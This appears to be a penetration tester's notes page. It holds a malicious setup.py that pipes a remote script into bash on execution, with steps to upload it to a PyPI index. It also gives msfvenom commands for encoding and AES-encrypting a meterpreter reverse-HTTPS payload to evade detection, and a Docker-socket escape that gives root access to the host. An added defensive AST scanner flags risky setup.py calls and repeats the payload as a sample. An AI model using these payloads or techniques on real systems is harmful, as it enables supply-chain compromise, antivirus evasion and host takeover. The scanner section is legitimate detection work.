xct's notes

PyPi Package Upload

Minimal Python Package:
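```python
from distutils.core import setup
import os

# Runs whenever setup.py is executed, before setup() is called.
# Skipped on hosts whose /etc/passwd already contains the string "xct".
if "xct" not in open("/etc/passwd").read():
    os.system("curl <ip>/x.sh|/bin/bash")

setup(name='xct',
      version='1.0',
      py_modules=[],
      )
```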
Then you can run python setup.py sdist upload -r local to upload it to a remote PyPI server. This needs a configuration file in the home directory:
```ini
[distutils]
index-servers =
    local

[local]
repository: http://<>
username: <>
password: <>
```
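From the defender's side, a package like the one above can be caught before installation by statically checking setup.py for command execution at top level. This is an added example, not part of the original notes; the RISKY watch list and all function names are assumptions chosen for illustration.

```python
import ast

RISKY = {"os.system", "os.popen", "subprocess.run", "subprocess.call",
         "subprocess.Popen", "exec", "eval"}  # assumed watch list, extend as needed

def _aliases(tree):
    # Map local names to what they were imported as (import os as o -> {"o": "os"}).
    names = {}
    for node in ast.walk(tree):
        if isinstance(node, (ast.Import, ast.ImportFrom)):
            prefix = f"{node.module}." if isinstance(node, ast.ImportFrom) and node.module else ""
            for a in node.names:
                names[a.asname or a.name] = prefix + a.name
    return names

def _dotted(func, names):
    # Resolve a call target such as o.system or a bare system to "os.system".
    parts = []
    while isinstance(func, ast.Attribute):
        parts.append(func.attr)
        func = func.value
    root = names.get(func.id, func.id) if isinstance(func, ast.Name) else "?"
    return ".".join([root] + parts[::-1])

def _top_level(node):
    # Yield nodes that run when setup.py itself runs; function bodies are skipped.
    for child in ast.iter_child_nodes(node):
        if not isinstance(child, (ast.FunctionDef, ast.AsyncFunctionDef, ast.Lambda)):
            yield child
            yield from _top_level(child)

def scan_setup_py(source):
    # Return (line, resolved call, first literal argument) per risky top-level call.
    tree = ast.parse(source)
    names, findings = _aliases(tree), []
    for node in _top_level(tree):
        name = _dotted(node.func, names) if isinstance(node, ast.Call) else None
        if name in RISKY:
            lit = node.args[0].value if node.args and isinstance(node.args[0], ast.Constant) else None
            findings.append((node.lineno, name, lit))
    return findings

# Constructed sample: the setup.py from the notes above, condensed.
SAMPLE = '''from distutils.core import setup
import os
if not "xct" in open("/etc/passwd").read():
    os.system("curl <ip>/x.sh|/bin/bash")
setup(name='xct', version='1.0', py_modules=[])
'''
if __name__ == "__main__": print(scan_setup_py(SAMPLE))
```

Run it against the setup.py extracted from an sdist before the package is built or installed, for example as a gate in front of an internal index.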

Encode existing payload with msfvenom

```bash
msfvenom -f raw -i 33 -a x86_64 --platform windows -e x86/shikata_ga_nai -p generic/custom PAYLOADFILE=<file> -o <enc_file>
```
Note that shikata_ga_nai does not work for x64 payloads; in this case we can use x64/zutto_dekiru.

Create encrypted payload with msfvenom

```bash
msfvenom -p windows/x64/meterpreter/reverse_https LHOST= LPORT=443 --encrypt aes256 --encrypt-key mykey -f exe -o aes.exe
```

Exposed Docker Socket RCE

```bash
docker -H <ip>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
```
For file access, use cat /mnt/etc/passwd; for RCE, use chroot /mnt.